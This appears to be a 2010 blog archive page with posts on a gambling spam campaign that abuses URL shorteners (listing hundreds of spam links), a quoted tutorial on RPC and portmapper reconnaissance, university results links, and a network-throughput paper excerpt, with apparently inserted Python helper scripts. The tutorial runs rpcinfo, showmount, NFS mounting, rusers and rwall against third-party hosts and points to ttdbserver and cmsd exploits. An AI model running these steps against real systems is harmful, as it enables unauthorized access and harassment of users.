Tuesday, August 24, 2010

URL Shortening Services

Spammers Abusing URL Shortening Services

We've previously warned about the dangers of following "Tiny URLs" on Twitter. With only 140 characters to use in your message, many Twitterers use URL shortening services to save their precious characters. Unfortunately, most people have no idea where a shortened link is going to take them until they click on it and get forwarded by the URL shortening service. It's a bit like playing Russian roulette: click the shortened URL, and you may get an informative news story, an insightful blog article, pornography, or a new virus!


At the UAB Spam Data Mine we've seen a few of these Tiny URLs used in spam, but now we have our first major campaign that is exploiting them in a highly organized way. The shortening services we have seen abused in this campaign are:

aafter.us
bit.ly
is.gd
jh.to
jtty.com
myurl.in
o.ly
phaze.me
sturly.com
tcbp.net
tlink.me
urltwitter.com


So far we've seen almost a thousand of these spam messages, and have encountered 453 unique URLs at this point. Here are the subjects that are being used in this spam campaign:

Subject: $10 free deposit
Subject: $5000 Jackpot waiting for you!
Subject: 200% bonus on every deposit
Subject: 75 and 90 Ball Bingo
Subject: Become A Bingo Hustler
Subject: Become A Winner Today
Subject: Become A Winner With Bingo
Subject: b-i-n-g-o for you!
Subject: Bingo has never been easier.
Subject: Bing-o Was Her Name-o
Subject: Do you like to play bingo online?
Subject: Enjoy Bingo Online
Subject: Ever wanted to play Bingo for Cash ?
Subject: Gamble online? Read me!
Subject: Gamble With Bingo
Subject: Gamble? Like to play online?
Subject: Hot 9-Real SLot Machines! $25,000 Jackpot
Subject: Hustle Online. Play Bingo.
Subject: Like Bingo? Win $
Subject: Nickel, Dime, Quarter, & High Roller Games!
Subject: Nightly Events for CASH Prizes
Subject: Online diplomas here.
Subject: Play Bing0 Online
Subject: Play Bingo Now
Subject: Play Bingo Today
Subject: play online
Subject: Play Online Now
Subject: Play Online, Win Today
Subject: Someone has invited you to a game of Bingo
Subject: Something For You. Play Online.
Subject: Vehicle Warranty - 60% off
Subject: Want to play bingo online and win CASH ?
Subject: Win With Bingo
Subject: You have been invited to a Bingo game!

We see this campaign as a dangerous precedent which could be followed by other spammers to make our efforts to block their spam more difficult. As one would expect, the spammer, in addition to cheating the affiliate program and offering "probably illegal" gambling to his email recipients, is delivering his spam message through a world-wide botnet of compromised computers. Just in our spam samples, we have spam for this campaign sent from 698 different computers in 43 different countries around the world.

Afrinic countries of CI, MA, SD, ZA
APNIC countries of BD, HK, ID, IN, JP, KR, PK, TH, TW, VN
ARIN countries of US (only 6 machines)
LACNIC countries of AR, BR, CL, CO, MX, SV, VE
RIPENCC countries of AM, AZ, BY, DE, EU, GR, HR, HU, IL, IQ, IR, IT, KZ, MD, PL, PT, RO, RS, RU, UA, UZ

Despite a broad smattering of countries, 43% of our spam came from Brazil, 20% from Russia, 13% from Ukraine, 7% from India, and 2% from Italy. No other country represented more than 1% of the spam we received in this campaign.


Here are the URLs that we have seen so far in this campaign:

http://aafter.us/0oysiA
http://aafter.us/15Exas
http://aafter.us/3d3V9e
http://aafter.us/459UeB
http://aafter.us/4fOecg
http://aafter.us/4R2udg
http://aafter.us/4YzvqA
http://aafter.us/6DvEsN
http://aafter.us/78Lj60
http://aafter.us/9GQEkZ
http://aafter.us/9TOYVb
http://aafter.us/A4Oc0S
http://aafter.us/AxwsYK
http://aafter.us/b9rkEe
http://aafter.us/bezEO3
http://aafter.us/BIyffd
http://aafter.us/ckqW55
http://aafter.us/cyHq06
http://aafter.us/D8kzvt
http://aafter.us/DBYJNk
http://aafter.us/dpJxBc
http://aafter.us/ew7332
http://aafter.us/FIDLQs
http://aafter.us/FJLPyM
http://aafter.us/fTJDW4
http://aafter.us/jptgOx
http://aafter.us/JwmKyP
http://aafter.us/jYg3j6
http://aafter.us/kdOH1o
http://aafter.us/knACii
http://aafter.us/motFQJ
http://aafter.us/n8quI5
http://aafter.us/N8U0Bq
http://aafter.us/P8o6Kn
http://aafter.us/PI3BvT
http://aafter.us/qDDkB6
http://aafter.us/QfSfkf
http://aafter.us/RH3z2F
http://aafter.us/rNqm6H
http://aafter.us/sEwQMU
http://aafter.us/siykT5
http://aafter.us/sY6RN1
http://aafter.us/TXgsXd
http://aafter.us/UxbBYV
http://aafter.us/vcmHnv
http://aafter.us/XwUWd3
http://aafter.us/YP4zHn
http://aafter.us/YUXbB4
http://aafter.us/ZjUAOw
http://bit.ly/10VJRX
http://bit.ly/11oYQ8
http://bit.ly/14egZi
http://bit.ly/15piKn
http://bit.ly/16aOsd
http://bit.ly/16iqi3
http://bit.ly/16temb
http://bit.ly/19AQlF
http://bit.ly/37LQeX
http://bit.ly/4mrqW9
http://bit.ly/8Tbvz
http://bit.ly/9K5r5
http://bit.ly/B0S1U
http://bit.ly/b3JyJ
http://bit.ly/E7hiD
http://bit.ly/eBlww
http://bit.ly/Ex5GL
http://bit.ly/EzZV4
http://bit.ly/FIolK
http://bit.ly/gj9Py
http://bit.ly/gQxNZ
http://bit.ly/ih7Di
http://bit.ly/iwdpY
http://bit.ly/joj8y
http://bit.ly/lhPp7
http://bit.ly/MOXP7
http://bit.ly/N3iVs
http://bit.ly/Q4XY0
http://bit.ly/q7EwA
http://bit.ly/RWnFc
http://bit.ly/tdLyV
http://bit.ly/TEXC4
http://bit.ly/tSW62
http://bit.ly/ttrZ5
http://bit.ly/tvZ0h
http://bit.ly/V2q7R
http://bit.ly/Ve1jJ
http://bit.ly/VI7n6
http://bit.ly/Vs7Tb
http://bit.ly/xiUSr
http://bit.ly/xJEcE
http://bit.ly/xjIii
http://bit.ly/YdVa5
http://is.gd/1xL2e
http://is.gd/1xL2f
http://is.gd/1xL2g
http://is.gd/1xL2h
http://is.gd/1xL2i
http://is.gd/1xL2k
http://is.gd/1xL4B
http://is.gd/1xL4E
http://is.gd/1xL4F
http://is.gd/1xL4G
http://is.gd/1xL4L
http://is.gd/1xL6e
http://is.gd/1xL6m
http://is.gd/1xL6o
http://is.gd/1xL6r
http://is.gd/1xL6u
http://is.gd/1xL6z
http://is.gd/1xL8H
http://is.gd/1xL8t
http://is.gd/1xLaB
http://is.gd/1xLaE
http://is.gd/1xLaK
http://is.gd/1xLaO
http://is.gd/1xLaP
http://is.gd/1xLaW
http://is.gd/1xLcS
http://is.gd/1xLdc
http://is.gd/1xLdg
http://is.gd/1xLdh
http://is.gd/1xLdi
http://is.gd/1xLeX
http://is.gd/1xLff
http://is.gd/1xLfG
http://is.gd/1xLfx
http://jh.to/1obuti
http://jh.to/3ulofu
http://jh.to/4alo9u
http://jh.to/4u0axo
http://jh.to/4u9o8u
http://jh.to/5ayoja
http://jh.to/9eyisi
http://jh.to/9i8ika
http://jh.to/do0eba
http://jh.to/do9ihu
http://jh.to/ha6e0u
http://jh.to/je2a9e
http://jh.to/le8iha
http://jh.to/li3iju
http://jh.to/lozi1i
http://jh.to/rokoye
http://jh.to/vetagi
http://jh.to/xu5onu
http://jh.to/yekife
http://jh.to/yilizo
http://jh.to/zeximo
http://jtty.com/05i
http://jtty.com/0g8k
http://jtty.com/640z
http://jtty.com/6g0
http://jtty.com/90jm
http://jtty.com/aeuw
http://jtty.com/afn2
http://jtty.com/alr9
http://jtty.com/bhsv
http://jtty.com/cgt2
http://jtty.com/clx8
http://jtty.com/cn69
http://jtty.com/dhs9
http://jtty.com/dqr6
http://jtty.com/e2b0
http://jtty.com/e589
http://jtty.com/ehlm
http://jtty.com/ejn3
http://jtty.com/ely7
http://jtty.com/eu27
http://jtty.com/fruy
http://jtty.com/gkot
http://jtty.com/hklq
http://jtty.com/htx3
http://jtty.com/ilq3
http://jtty.com/ilw4
http://jtty.com/ix12
http://jtty.com/ixz6
http://jtty.com/jk17
http://jtty.com/knwz
http://jtty.com/lw56
http://jtty.com/lwz2
http://jtty.com/nrz1
http://jtty.com/ouxz
http://jtty.com/rsv9
http://jtty.com/tyz6
http://jtty.com/tz68
http://jtty.com/vyz2
http://jtty.com/wpz0
http://jtty.com/wt0h
http://jtty.com/y0q3
http://myurl.in/2SA9A
http://myurl.in/3Kgq3
http://myurl.in/3txkM
http://myurl.in/50WTX
http://myurl.in/6MUXd
http://myurl.in/6rP1t
http://myurl.in/8m00V
http://myurl.in/8QnMd
http://myurl.in/9ml8L
http://myurl.in/AhDeA
http://myurl.in/AKF1g
http://myurl.in/AMJBY
http://myurl.in/BCD7U
http://myurl.in/BM1RA
http://myurl.in/CcSAD
http://myurl.in/cooWR
http://myurl.in/drm2U
http://myurl.in/e0LIu
http://myurl.in/EcZlr
http://myurl.in/Ezbrh
http://myurl.in/Fk2Qs
http://myurl.in/H6xsv
http://myurl.in/HbY51
http://myurl.in/HiUfB
http://myurl.in/ivqVE
http://myurl.in/kr0Xn
http://myurl.in/L62hH
http://myurl.in/LUk5g
http://myurl.in/NWsMe
http://myurl.in/oa5Zo
http://myurl.in/Oq8Jj
http://myurl.in/pWVr8
http://myurl.in/q6qsq
http://myurl.in/rhChK
http://myurl.in/th2Gr
http://myurl.in/TSR8k
http://myurl.in/u8jyb
http://myurl.in/UzmYY
http://myurl.in/vppYC
http://myurl.in/wZoeF
http://myurl.in/XAj2y
http://myurl.in/xIIll
http://myurl.in/Y2Dc7
http://myurl.in/YbCtF
http://myurl.in/YG2Ny
http://myurl.in/yl4s2
http://myurl.in/yxj2l
http://o.ly/qT1
http://o.ly/qT3
http://o.ly/qT4
http://o.ly/qT5
http://o.ly/qT6
http://o.ly/qT7
http://o.ly/qT8
http://o.ly/qT9
http://o.ly/qTA
http://o.ly/qTb
http://o.ly/qTC
http://o.ly/qTH
http://o.ly/qTJ
http://o.ly/qTK
http://o.ly/qTm
http://o.ly/qTn
http://o.ly/qTO
http://o.ly/qTR
http://o.ly/qTS
http://o.ly/qTU
http://o.ly/qTV
http://o.ly/qTW
http://o.ly/qTX
http://o.ly/qYF
http://o.ly/qYh
http://o.ly/qYi
http://o.ly/qYm
http://o.ly/qYn
http://o.ly/qYo
http://o.ly/qYp
http://o.ly/qYq
http://o.ly/qYS
http://o.ly/qYt
http://o.ly/qYv
http://o.ly/qYw
http://o.ly/qYx
http://o.ly/qYy
http://phaze.me/0994
http://phaze.me/0cjw
http://phaze.me/0r08
http://phaze.me/11c7
http://phaze.me/1j84
http://phaze.me/1jy4
http://phaze.me/2dsc
http://phaze.me/2s08
http://phaze.me/2tq6
http://phaze.me/2xzx
http://phaze.me/3k5z
http://phaze.me/3r3k
http://phaze.me/3trj
http://phaze.me/3v4x
http://phaze.me/4kdb
http://phaze.me/4q59
http://phaze.me/5314
http://phaze.me/5jb1
http://phaze.me/6gjq
http://phaze.me/6n6p
http://phaze.me/836x
http://phaze.me/ckyd
http://phaze.me/d4nf
http://phaze.me/dj19
http://phaze.me/ffrn
http://phaze.me/fn86
http://phaze.me/g30w
http://phaze.me/g68v
http://phaze.me/gm36
http://phaze.me/hwjf
http://phaze.me/jh88
http://phaze.me/jrny
http://phaze.me/k12t
http://phaze.me/m9b6
http://phaze.me/nq7c
http://phaze.me/nt1x
http://phaze.me/nz1b
http://phaze.me/p0q0
http://phaze.me/pkkt
http://phaze.me/rm2y
http://phaze.me/t4wq
http://phaze.me/tqn0
http://phaze.me/v1b0
http://phaze.me/vm98
http://phaze.me/vmtm
http://phaze.me/vqqw
http://phaze.me/w736
http://phaze.me/xptc
http://phaze.me/yqnd
http://phaze.me/zh2v
http://sturly.com/aal0
http://sturly.com/aal1
http://sturly.com/aal2
http://sturly.com/aal5
http://sturly.com/aal6
http://sturly.com/aalm
http://sturly.com/aalq
http://sturly.com/aalr
http://sturly.com/aals
http://sturly.com/aalv
http://sturly.com/aalw
http://sturly.com/aalx
http://sturly.com/aaly
http://sturly.com/aalz
http://sturly.com/aama
http://sturly.com/aamb
http://sturly.com/aamc
http://sturly.com/aame
http://sturly.com/aamf
http://sturly.com/aamg
http://sturly.com/aamh
http://sturly.com/aami
http://sturly.com/aamk
http://sturly.com/aaml
http://sturly.com/aams
http://sturly.com/aamu
http://tcbp.net/s9
http://tcbp.net/sa
http://tcbp.net/sB
http://tcbp.net/sc
http://tcbp.net/sd
http://tcbp.net/sE
http://tcbp.net/sF
http://tcbp.net/sg
http://tcbp.net/sh
http://tcbp.net/sI
http://tcbp.net/sj
http://tcbp.net/sk
http://tcbp.net/sl
http://tcbp.net/sN
http://tcbp.net/sQ
http://tcbp.net/sS
http://tcbp.net/st
http://tcbp.net/sW
http://tcbp.net/sX
http://tcbp.net/sY
http://tcbp.net/t0
http://tcbp.net/t2
http://tcbp.net/t3
http://tcbp.net/t5
http://tcbp.net/t7
http://tcbp.net/t8
http://tcbp.net/t9
http://tcbp.net/ta
http://tcbp.net/tb
http://tcbp.net/tc
http://tcbp.net/te
http://tcbp.net/ti
http://tcbp.net/tj
http://tcbp.net/tk
http://tlink.me/1499
http://tlink.me/1500
http://tlink.me/1501
http://tlink.me/1502
http://tlink.me/1503
http://tlink.me/1504
http://tlink.me/1505
http://tlink.me/1507
http://tlink.me/1508
http://tlink.me/1510
http://tlink.me/1514
http://tlink.me/1515
http://tlink.me/1516
http://tlink.me/1517
http://tlink.me/1518
http://tlink.me/1519
http://tlink.me/1520
http://tlink.me/1525
http://tlink.me/1526
http://tlink.me/1527
http://tlink.me/1529
http://tlink.me/1530
http://tlink.me/1532
http://tlink.me/1533
http://tlink.me/1534
http://tlink.me/1537
http://tlink.me/1538
http://tlink.me/1540
http://tlink.me/1542
http://tlink.me/1543
http://tlink.me/1545
http://tlink.me/1549
http://tlink.me/1550
http://tlink.me/1554
http://tlink.me/1555
http://tlink.me/1557
http://tlink.me/1560
http://tlink.me/1563
http://tlink.me/1564
http://tlink.me/1565
http://tlink.me/1566
http://tlink.me/1567
http://tlink.me/1569
http://tlink.me/1570
http://tlink.me/1571
http://tlink.me/1572
http://tlink.me/1573
http://tlink.me/1574
http://tlink.me/1575
http://tlink.me/1576
http://urltwitter.com/1ipevu
http://urltwitter.com/2i7isa
http://urltwitter.com/4aza2o
http://urltwitter.com/4otifu
http://urltwitter.com/5ireri
http://urltwitter.com/6eyoco
http://urltwitter.com/6i3eko
http://urltwitter.com/bi3e7o
http://urltwitter.com/bixaso
http://urltwitter.com/fale2e
http://urltwitter.com/gu3eto
http://urltwitter.com/jafabu
http://urltwitter.com/jarewa
http://urltwitter.com/kedopu
http://urltwitter.com/kuno6o
http://urltwitter.com/me3ajo
http://urltwitter.com/nasozi
http://urltwitter.com/so3afi
http://urltwitter.com/vido6a
http://urltwitter.com/wulule
http://urltwitter.com/yucazo
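A small triage script for the kind of message described in this post, added here as an example (it is not code from the UAB Spam Data Mine). It scores a message on two signals the post documents, a gambling lure in the subject and a link to one of the twelve abused shortening services, and resolves a shortened link one redirect hop at a time without fetching the landing page, so an analyst can see where the click would go. The sample message and the redirect map are constructed; the hostname `bingo-landing.invalid` is a placeholder, and `fake_head` stands in for the live shortener so the script runs offline.

```python
"""Triage helper for the shortened-URL spam campaign described above.

Added example (not code from the UAB Spam Data Mine post). Assumes a mail
filter that can hand us a message's subject and body as text.
"""
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlparse

# Shortening services the post lists as abused by this campaign.
ABUSED_SHORTENERS = {
    "aafter.us", "bit.ly", "is.gd", "jh.to", "jtty.com", "myurl.in", "o.ly",
    "phaze.me", "sturly.com", "tcbp.net", "tlink.me", "urltwitter.com",
}

# Lures drawn from the subject lines the post reproduces.
CAMPAIGN_KEYWORDS = ("bingo", "bing0", "jackpot", "gamble", "deposit", "play online")

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def extract_urls(text):
    """Return every http(s) URL in a block of text."""
    return URL_RE.findall(text)


def shortener_host(url):
    """Return the shortener domain if the URL points at one we watch, else None."""
    host = (urlparse(url).hostname or "").lower()
    if host.startswith("www."):
        host = host[4:]
    return host if host in ABUSED_SHORTENERS else None


def score_message(subject, body):
    """Heuristic score 0-3: subject lure, watched shortener link, bonus for both."""
    reasons = []
    subject_lc = subject.lower()
    lures = [k for k in CAMPAIGN_KEYWORDS if k in subject_lc]
    if lures:
        reasons.append("subject lure(s): " + ", ".join(lures))
    shortened = sorted({shortener_host(u) for u in extract_urls(body)} - {None})
    if shortened:
        reasons.append("watched shortener(s): " + ", ".join(shortened))
    score = len(reasons) + (1 if len(reasons) == 2 else 0)
    return score, reasons


def expand_short_url(url, head, max_hops=5):
    """Resolve a shortened URL hop by hop without fetching the final page.

    `head(url)` must return (status, location_header_or_None). Injecting it
    keeps the logic testable offline; pass `http_head` for live use.
    Returns the redirect chain, first element the original URL.
    """
    chain = [url]
    for _ in range(max_hops):
        status, location = head(chain[-1])
        if status not in (301, 302, 303, 307, 308) or not location:
            return chain
        chain.append(urljoin(chain[-1], location))
    raise RuntimeError("redirect chain longer than %d hops: %s" % (max_hops, chain))


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects; urllib then raises HTTPError for the 3xx."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


_OPENER = urllib.request.build_opener(_NoRedirect)


def http_head(url, timeout=10):
    """HEAD one URL and report (status, Location) for a single hop."""
    request = urllib.request.Request(url, method="HEAD")
    try:
        with _OPENER.open(request, timeout=timeout) as response:
            return response.status, response.headers.get("Location")
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location")


# Constructed sample message in the style of the campaign (not a real capture).
SAMPLE_SUBJECT = "Play Bingo Now"
SAMPLE_BODY = "Someone has invited you to a game of Bingo. Join at http://bit.ly/10VJRX today!"

# Constructed redirect map standing in for the live shortener (offline demo).
FAKE_REDIRECTS = {
    "http://bit.ly/10VJRX": (301, "http://bingo-landing.invalid/promo?aff=123"),
    "http://bingo-landing.invalid/promo?aff=123": (200, None),
}


def fake_head(url):
    return FAKE_REDIRECTS.get(url, (404, None))


def triage_sample():
    """Score the sample message and expand each link it carries."""
    score, reasons = score_message(SAMPLE_SUBJECT, SAMPLE_BODY)
    chains = [expand_short_url(u, fake_head) for u in extract_urls(SAMPLE_BODY)]
    return score, reasons, chains


if __name__ == "__main__":
    print(triage_sample())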

RPC & portmapper (111 TCP + other UDP)

The portmapper service works like this - I would connect to the portmapper port and state that I want to use a specific RPC service - the portmapper would then reply and tell me which port to use. (RPC stands for remote procedure call - it's like executing a function on a remote machine and getting the output back.) The reverse is also true - if I want to write an RPC service, I must register it with the portmapper, so that the client that wants the service knows on what port I am listening. So what is the bottom line?

I could save myself a lot of portscanning trouble and just ask the portmapper what services are running on which ports. Now obviously the portmapper service itself must be running. So I might be testing for machines that have port 111 open first. Assuming that I now have a machine with an open portmapper port the following is done:
> rpcinfo -p 210.xxx.96.151
program vers proto port
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100001 1 udp 1038 rstatd
100001 2 udp 1038 rstatd
100001 3 udp 1038 rstatd
100002 1 udp 1040 rusersd
100002 2 udp 1040 rusersd
100008 1 udp 1042 walld
100012 1 udp 1044 sprayd
150001 1 udp 1046 pcnfsd
150001 2 udp 1046 pcnfsd
100083 1 tcp 1026 ttdbserver
100068 2 udp 1048 cmsd
100068 3 udp 1048 cmsd
100068 4 udp 1048 cmsd
100068 5 udp 1048 cmsd
100003 2 udp 2049 nfs
100005 1 udp 785 mountd
100005 1 tcp 787 mountd
100024 1 udp 989 status
100024 1 tcp 991 status
100021 1 tcp 840 nlockmgr
100021 1 udp 842 nlockmgr
100021 3 tcp 845 nlockmgr
100021 3 udp 847 nlockmgr
100020 1 udp 850 llockmgr
100020 1 tcp 852 llockmgr
100021 2 tcp 855 nlockmgr
1342177279 3 tcp 1067
1342177279 1 tcp 1067
(From "Breaking into computer networks from the Internet", Roelof Temmingh & SensePost, page 61)

From this we can see which RPC services the host is running. A very interesting service to see running is NFS (network file system). Maybe the host is exporting some interesting NFS "shares"? Let us have a look:
> showmount -a 210.xxx.96.151
All mount points on 210.xxx.96.151:
xxx.com.tw:/HUANGFS
xxx.com.tw:/HUANGFS
xxx.com.tw:/HUANGFS
We can see that this host is only exporting the shares to specific machines (in Taiwan) - not to the rest of the world - so it is pretty useless to even try to mount these "shares" on our host. Maybe I'll look for a host with some public shares, and then we'll look at mounting those. OK...here goes:
> showmount -e 128.xxx.135.52
Exports list on 128.xxx.135.52:
/install_2.6 Everyone
/export/install Everyone
/psrc rcd_hosts
/usr/share/opt rcd_hosts xxx.edu
/usr/share/opt2.5 rcd_hosts
/scratch7 rcd_hosts
/pucc rcd_hosts xxx.edu
/home/helios/u52 rcd_all
/home/helios/u51 rcd_all
# mount_nfs 128.xxx.135.52:/export/install /mnt
# cd /mnt
# ls
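The two listings above are exactly what an administrator should be reading on their own hosts. The following audit script is an added example, not part of the SensePost text: it parses `rpcinfo -p` and `showmount -e` output and ranks what to fix first, using the text's own warnings (ttdbserver and cmsd have remote command-execution bugs; rusersd, rstatd and walld leak information or accept rwall messages; exports listed as "Everyone" are mountable by any host). The two input samples are constructed to mirror the listings above, and the severity table is this script's own classification.

```python
"""Audit helper for rpcinfo / showmount output (added example, not the text's code)."""

# Constructed input modelled on the `rpcinfo -p` listing in the text.
RPCINFO_SAMPLE = """\
   program vers proto   port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100001    1   udp   1038  rstatd
    100002    1   udp   1040  rusersd
    100008    1   udp   1042  walld
    100012    1   udp   1044  sprayd
    100083    1   tcp   1026  ttdbserver
    100068    2   udp   1048  cmsd
    100003    2   udp   2049  nfs
    100005    1   udp    785  mountd
    1342177279    3   tcp   1067
"""

# Constructed input modelled on the `showmount -e` listing in the text.
SHOWMOUNT_SAMPLE = """\
Exports list on 128.xxx.135.52:
/install_2.6      Everyone
/export/install   Everyone
/psrc             rcd_hosts
/usr/share/opt    rcd_hosts xxx.edu
/home/helios/u52  rcd_all
"""

# Severity by service name: "high" follows the text's warning about ttdbserver
# and cmsd; "medium" covers services that leak users or load, accept rwall
# messages, or expose files. Anything else named is "info" (confirm it is needed).
SERVICE_RISK = {
    "ttdbserver": ("high", "known remote command execution bugs; disable or patch"),
    "cmsd": ("high", "known remote command execution bugs; disable or patch"),
    "rusersd": ("medium", "lists logged-in users to anyone (finger equivalent)"),
    "rstatd": ("medium", "reports uptime and load to anyone"),
    "walld": ("medium", "lets remote users write to every console (rwall)"),
    "nfs": ("medium", "file sharing; review exports and restrict clients"),
    "mountd": ("medium", "file sharing; review exports and restrict clients"),
}


def parse_rpcinfo(text):
    """Parse `rpcinfo -p` output into dicts; unnamed programs get name None."""
    services = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or not fields[0].isdigit():
            continue  # header or blank line
        services.append({
            "program": int(fields[0]), "version": int(fields[1]),
            "proto": fields[2], "port": int(fields[3]),
            "name": fields[4] if len(fields) > 4 else None,
        })
    return services


def parse_showmount(text):
    """Parse `showmount -e` output into (export_path, [allowed_clients]) pairs."""
    exports = []
    for line in text.splitlines():
        if line.startswith("/"):
            fields = line.split()
            exports.append((fields[0], fields[1:]))
    return exports


def audit(rpcinfo_text, showmount_text):
    """Return (severity, message) findings, highest severity first."""
    findings = []
    seen = set()
    for svc in parse_rpcinfo(rpcinfo_text):
        key = (svc["name"], svc["proto"], svc["port"])
        if key in seen:
            continue  # several versions of one service share a port
        seen.add(key)
        where = "%s/%d" % (svc["proto"], svc["port"])
        if svc["name"] is None:
            findings.append(("info", "unregistered program %d on %s; identify it"
                             % (svc["program"], where)))
        elif svc["name"] in SERVICE_RISK:
            sev, why = SERVICE_RISK[svc["name"]]
            findings.append((sev, "%s on %s: %s" % (svc["name"], where, why)))
        elif svc["name"] != "portmapper":
            findings.append(("info", "%s on %s: confirm it is needed" % (svc["name"], where)))
    for path, clients in parse_showmount(showmount_text):
        if any(c.lower() == "everyone" for c in clients):
            findings.append(("high", "NFS export %s is mountable by any host" % path))
    order = {"high": 0, "medium": 1, "info": 2}
    findings.sort(key=lambda f: order[f[0]])
    return findings


if __name__ == "__main__":
    for severity, message in audit(RPCINFO_SAMPLE, SHOWMOUNT_SAMPLE):
        print("[%s] %s" % (severity.upper(), message))
```

Feed it real output with `rpcinfo -p localhost` and `showmount -e localhost` on the host being reviewed; anything rated high should be disabled or patched, and exports open to "Everyone" should be restricted to named clients or a netgroup before anything else is touched.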


Let us move on to some of the other services. One of the other services that you would notice is "rusers". Rusers is the same as finger - there ain't that many tricks with rusers, but it would give you a list of users active on the host. It is very useful when the finger service is not running, or when it is blocked, and you need some usernames.

> rusers -al 210.xxx.96.151
Damn - no users logged on. Let us see if we can't find a host somewhere on the 'net with users logged on:
# rusers -al 128.xxx.135.109
wgw xxx.edu:console Sep 19 16:11 :53 (:0)
(confirming:)

> finger @128.xxx.135.109
[128.xxx.135.109]
Login Name TTY Idle When Where
wgw William Wolber console 1:06 Tue 09:11 :0

Another RPC service that is quite cute is the rstatd server. This service gives some (kinda useless) information such as uptime and load:
> rup 210.xxx.96.151
210.xxx.96.151 1:17am up 4 days, 22:14, load average: 0.00 0.00 0.01
Should I wish to, I could write a message to all the users logged in on the host using the rwall command (now... I don't want to do that, would I, but it would look like this):
>rwall 210.xxx.96.151
Greetings from South Africa!
^D
>

This command would write the above message to the consoles of all users connected to the host. Using this command in a loop has obvious annoying effects.
Another RPC service that is not mentioned here is the Yellow Pages system (YP). YP was quite popular at some stage in large corporations and universities, but it's rare to see it today. For a very nice discussion on ways to get juicy information from YP the best document must be Dan Farmer's "Improving the Security of Your Site by Breaking Into it" - you can find it here (http://www.ussrback.com/docs/papers/unix/farmer.txt).
The more serious problem with RPC services is that some of them are exploitable. The "ttdbserver" and "cmsd" services have known problems that would allow an attacker to execute any command on the host. These exploits are very OS dependent, but also very real...check your local exploit database for the goodies.

Monday, August 23, 2010

ANNA UNIVERSITY TIRUNELVELI PG PROGRAMME RESULTS:

anna university P.G programme results..


regulation 2007 and 2008:

http://218.248.20.134/PG10/PGIII.aspx


regulation 2009:

http://218.248.20.134/PG1X/PGI.aspx

Friday, August 20, 2010

Packet-Level Parallelism

Times given are in megabits per second for several protocol stacks. Our baseline Internet stack consists of TCP/IP/FDDI, representing protocol processing without any security. A second stack is an Internet stack with MD5 between TCP and IP, representing the work done for an application that requires authentication and integrity but no confidentiality. Our third stack uses DES above TCP and MD5 below TCP, which supports both confidentiality and integrity. Our fourth stack is the same as the third, except that we use triple-DES instead of DES.

These throughputs were measured on our 12-processor Challenge machine, using a single TCP connection with 4 KB packets. For these and all subsequent graphs, each data point is the average of 10 runs, where a run consists of measuring the steady-state throughput for 30 seconds, after an initial 30 second warmup period. Throughput graphs include 90 percent confidence intervals.

The baseline speed for the send-side TCP stack is roughly 138 Mbits/sec. Adding MD5 to the stack reduces throughput by nearly an order of magnitude, to a mere 18 Mbits/sec. Adding DES on top of TCP reduces throughput nearly 2 orders of magnitude, to 4.6 Mbits/sec. Using Triple-DES is 3 times slower at 1.5 Mbits/sec.

Figure 4 shows the corresponding relative speedup for the send-side tests, where speedup is throughput normalized relative to the uniprocessor throughput for the appropriate stack. The theoretical ideal linear speedup is included for comparison. Previous work [3, 24] has shown limited performance gains when using packet-level parallelism for a single TCP connection, barring any other protocol processing, and this is reflected by the baseline TCP/IP stack's minimal speedup. This is because manipulating a TCP connection's state is large relative to the IP and FDDI processing and must occur inside a single locked, serial component. Of course, throughput can be improved by using multiple connections.

However, as more compute-intensive cryptographic protocols are used, while the throughput goes down, the relative speedup improves. For example, the MD5 stack achieves a speedup of 8 with 12 processors, and the DES and Triple-DES stacks produce very close to linear speedup
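To make the measurement method concrete, here is an added example (not code from the paper) that carries out the arithmetic the text describes: the mean of 10 runs with a 90 percent confidence interval, and speedup defined as throughput normalised to the uniprocessor run. It also adds an Amdahl-style estimate of the serialised fraction implied by an observed speedup, which is this example's interpretation of the "single locked, serial component" explanation and not a figure the paper reports. The per-run throughputs are constructed to land on the quoted numbers (about 18 Mbits/sec for MD5 on one processor and a speedup of 8 on 12); they are not the paper's data.

```python
"""Speedup and confidence-interval arithmetic for the measurements described above.

Added example, not code from the paper. The run data is constructed to match
the reported figures; it is not the paper's raw data.
"""
import math
from statistics import mean, stdev

# Two-sided Student t critical value for 90% confidence with 10 runs (9 degrees
# of freedom), hard-coded so the script needs no SciPy.
T_CRIT_90_DF9 = 1.833


def confidence_interval(samples, t_crit=T_CRIT_90_DF9):
    """Mean and half-width of the t-based confidence interval of a set of runs."""
    n = len(samples)
    half_width = t_crit * stdev(samples) / math.sqrt(n)
    return mean(samples), half_width


def speedup(throughput_by_procs):
    """Speedup as the paper defines it: throughput normalised to the uniprocessor run."""
    base = throughput_by_procs[1]
    return {p: t / base for p, t in sorted(throughput_by_procs.items())}


def serial_fraction(observed_speedup, procs):
    """Amdahl-style estimate of the fraction of work that runs inside the serial
    locked component, given the speedup observed on `procs` processors.
    An added interpretation of the paper's explanation, not a figure it reports."""
    return (procs / observed_speedup - 1) / (procs - 1)


# Constructed per-run throughputs (Mbits/sec) for the MD5 stack, 10 runs each.
MD5_RUNS = {
    1: [17.6, 17.8, 17.9, 18.0, 18.0, 18.0, 18.1, 18.2, 18.2, 18.2],
    12: [142.0, 143.0, 143.5, 144.0, 144.0, 144.0, 144.5, 145.0, 145.0, 145.0],
}


def summarise(runs_by_procs):
    """Per processor count: mean throughput, 90% CI half-width, relative speedup."""
    stats = {p: confidence_interval(r) for p, r in runs_by_procs.items()}
    rel = speedup({p: m for p, (m, _) in stats.items()})
    return {p: {"mean": stats[p][0], "ci_half_width": stats[p][1], "speedup": rel[p]}
            for p in stats}


if __name__ == "__main__":
    for p, row in summarise(MD5_RUNS).items():
        print("%2d procs: %6.1f +/- %.2f Mbits/sec, speedup %.2f"
              % (p, row["mean"], row["ci_half_width"], row["speedup"]))
    print("implied serial fraction: %.3f" % serial_fraction(8.0, 12))
```

With the constructed data the MD5 stack shows a speedup of 8 on 12 processors, which under the Amdahl model corresponds to roughly 4.5 percent of the work being serialised; the same formula applied to the baseline stack's "minimal speedup" gives a much larger serial fraction, which is the paper's point about TCP connection state.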

Thursday, August 5, 2010

